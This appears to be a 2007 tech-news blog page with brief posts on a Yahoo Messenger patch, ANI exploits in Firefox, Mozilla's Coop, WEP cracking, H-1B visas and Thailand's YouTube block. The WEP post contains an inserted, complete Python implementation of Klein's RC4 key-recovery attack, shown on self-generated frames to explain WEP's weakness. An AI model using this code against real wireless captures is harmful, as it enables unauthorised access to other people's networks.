4/4/2007

Yahoo plugs Messenger hole

Filed under: — Aviran Mordo

Yahoo this week released an updated version of its instant messaging application to fix a vulnerability in the audio conferencing feature. If exploited, the security hole could give an attacker full control over a Windows computer running the vulnerable software, Yahoo said on its Web site. All versions of Yahoo Messenger downloaded before March 13 are affected, the company said.

Firefox Still Sitting Duck for ANI Exploits

Filed under: — Aviran Mordo

Firefox browsers are still vulnerable to attacks exploiting the animated cursor flaw that caused Microsoft to rush out a patch on April 3.

Alexander Sotirov, the security researcher at Determina who first discovered the ANI flaw and reported it to Microsoft in December, has posted a video depicting successful ANI vulnerability exploits on both Internet Explorer 7 and Firefox 2.0 running on Vista in default mode.

In the video, Sotirov notes that turning on Protected Mode protects Vista when running IE: although the exploit still gives an attacker read access to all files on the system, Protected Mode prevents those files from being overwritten.

It turns out that Firefox uses the same vulnerable Windows component to process .ani files, Sotirov says in the video, “Which means it can be exploited in a way similar to Internet Explorer.”

Sotirov demonstrates opening an exploit URL in Firefox and successfully getting a command shell connection back. The shell again gives access to all system files, with the privileges of the currently logged-on user. But because Firefox has no low-privilege mode similar to IE’s Protected Mode, an attacker can also overwrite system files.

Mozilla To Build Social Networking Into Firefox

Filed under: — Aviran Mordo

Mozilla has released details on The Coop, a new product that will incorporate social networking features directly into the Firefox browser. This is not good news for the privately backed social browser Flock (also built on Mozilla), which has yet to release a 1.0 version of its browser. Many of the proposed features and some of the mockups created by Mike Beltzner suggest a significant overlap between the two products.

In fact, the Coop wiki page describing the product even includes an example screenshot of Flock, along with the description “The design will likely resemble [formerly of Flock] Chris Messina’s mockup for ‘People in the Browser’, with a horizontal bar containing avatars for a user’s friends, and icons overlaid on those avatars to indicate the presence of new content.”

The Coop product will allow Firefox users to “subscribe” to friends in the browser, bringing those friends into a sidebar. Those friends can share content and web pages with you, and you with them.

WEP key wireless cracking made easy

Filed under: — Aviran Mordo

Code breakers have discovered a technique for extracting a 104-bit Wired Equivalent Privacy (WEP) key in under a minute.

Cryptographic weaknesses in the first-generation wireless encryption standard have been known for years, but the latest attack requires the capture of just a tenth of the number of packets required by previous approaches. The technique recovers a 104-bit WEP key with 50 per cent probability from about 40,000 captured packets, roughly a minute of traffic on an 802.11g network running at full speed. Doubling the number of captured packets raises the probability of recovering the key to 95 per cent.

The latest attack illustrates the need to use the newer WPA (Wi-Fi Protected Access) standard, which is far more resistant to attack but is still infrequently used, even on wireless networks that employ any form of defence.
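The reason so few packets suffice is that WEP prepends a 24-bit cleartext IV to the secret key and feeds the result to RC4, and the first RC4 keystream bytes are correlated with the key bytes. The attack reported above builds on a correlation published by Andreas Klein; the following Python is an added example, not code from the article or from the researchers, implementing Klein's simpler byte-by-byte version of the recovery. It assumes (as a constructed setup) that the attacker knows the first 16 plaintext bytes of every frame (the LLC/SNAP header plus the fixed fields of an ARP request) and so knows 16 keystream bytes per frame; the frames, the IVs and the key are all generated inside the script. This plain vote needs more frames than the refined technique the article reports, so 100,000 constructed frames are used, which takes some seconds in pure Python.

```python
"""Klein-style key recovery against WEP's RC4(IV || key) construction.

Added example; not code from the article or from the researchers.  It
builds constructed frames under a chosen 104-bit key and recovers that key
from nothing but each frame's 24-bit IV and the keystream bytes exposed by
known plaintext.  Assumption: the attacker knows the first 16 plaintext
bytes of every frame (LLC/SNAP header plus the fixed fields of an ARP
request), so 16 keystream bytes per frame are available.
"""
import random

N = 256
# Constructed known plaintext: LLC/SNAP (AA AA 03 00 00 00, ethertype 0806)
# followed by the fixed ARP request fields (Ethernet/IPv4, opcode 1).
KNOWN_PLAINTEXT = bytes.fromhex("aaaa030000000806" "0001080006040001")


def rc4_ksa(key):
    """RC4 key scheduling: the permutation S after all 256 rounds."""
    k = (key * (N // len(key) + 1))[:N]  # key bytes repeated to 256
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + k[i]) & 255
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n bytes of RC4 keystream; WEP uses key = IV || secret."""
    S = rc4_ksa(key)
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 255
        j = (j + S[i]) & 255
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 255])
    return bytes(out)


def rc4_crypt(key, data):
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def capture_frames(secret, count, seed=1):
    """Constructed capture: (iv, ciphertext) for `count` ARP-like frames,
    each encrypted under a fresh random IV prepended to the secret key."""
    rng = random.Random(seed)
    frames = []
    for _ in range(count):
        iv = rng.getrandbits(24).to_bytes(3, "big")
        frames.append((iv, rc4_crypt(iv + secret, KNOWN_PLAINTEXT)))
    return frames


def klein_recover(frames, key_len=13):
    """Recover the secret bytes K[3..3+key_len-1] one at a time by voting.

    For key index i the attacker knows K[0..i-1] (IV plus bytes already
    recovered), so it can replay the first i KSA rounds exactly, giving
    S_i and j_i.  Klein's relation: with probability about 1.36/256 the
    i-th keystream byte X[i-1] satisfies
        K[i] = S_i^-1[i - X[i-1]] - j_i - S_i[i]   (mod 256),
    whereas any wrong value is suggested only about 1/256 of the time.
    Counting the suggested values over enough frames exposes K[i].
    """
    # Keystream = ciphertext XOR known plaintext.
    streams = [(iv, bytes(c ^ p for c, p in zip(ct, KNOWN_PLAINTEXT)))
               for iv, ct in frames]
    recovered = b""
    for i in range(3, 3 + key_len):
        votes = [0] * N
        for iv, x in streams:
            prefix = iv + recovered  # exactly the i known key bytes
            S = list(range(N))
            j = 0
            for r in range(i):  # replay KSA rounds 0..i-1
                j = (j + S[r] + prefix[r]) & 255
                S[r], S[j] = S[j], S[r]
            target = (i - x[i - 1]) & 255
            guess = (S.index(target) - j - S[i]) & 255
            votes[guess] += 1
        recovered += bytes([max(range(N), key=votes.__getitem__)])
    return recovered


def key_matches(frames, secret):
    """Confirm a candidate key by decrypting one captured frame."""
    iv, ct = frames[0]
    return rc4_crypt(iv + secret, ct) == KNOWN_PLAINTEXT


if __name__ == "__main__":
    secret = bytes.fromhex("0123456789abcdef0123456789")  # 13 bytes = 104 bits
    frames = capture_frames(secret, 100_000)  # some seconds in pure Python
    found = klein_recover(frames)
    print("recovered", found.hex(), "verified:", key_matches(frames, found))
```

The point to take from the run is structural: nothing about the key leaks through brute force, only through the fact that WEP reuses the same secret under attacker-visible IVs and that RC4's first output bytes depend on the early key-schedule state. WPA's per-packet keying (and the move away from RC4 in WPA2) removes exactly that structure, which is why the article's advice to migrate holds regardless of how many packets the next refinement needs.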

Annual H-1B visa cap met in one day

Filed under: — Aviran Mordo

The rush by companies, particularly of the high-tech persuasion, to apply for H-1B visas has come to an end–only one day after it began.

U.S. Citizenship and Immigration Services said Tuesday that it had received 150,000 applications as of Monday afternoon for the controversial work permits, which allow foreigners with a bachelor’s degree in their area of specialty to be employed in the United States for up to six years.

That’s more than enough applications to meet the cap for the visas, which currently stands at 65,000. Up to 20,000 additional visas are available for foreigners with advanced degrees from U.S. schools, but USCIS said it hadn’t yet determined how many applications fit in that category.

As for the extra applications, USCIS said it would use a “random selection” process to narrow down what it had already received. All rejected applications and their requisite fees–and those received on or after Wednesday–will be returned to their senders.

Thailand blocks YouTube for clip mocking king

Filed under: — Aviran Mordo

Thailand’s military-appointed government blocked access to on-line video-sharing Web site YouTube on Wednesday after its owner, Google Inc., declined to withdraw a video clip mocking the country’s revered monarch.

Communications Minister Sitthichai Pookaiyaudom told Reuters he ordered a block of the entire site, www.youtube.com, from Thailand after the ministry’s attempts to block the offending page last week failed.

“Since Google has rejected our repeated requests to withdraw the clip, we can’t help blocking the entire site in Thailand,” said Sitthichai, a telecoms professor who said he had spent most of his academic life researching eavesdropping devices.

“When they decide to withdraw the clip, we will withdraw the ban,” he said.
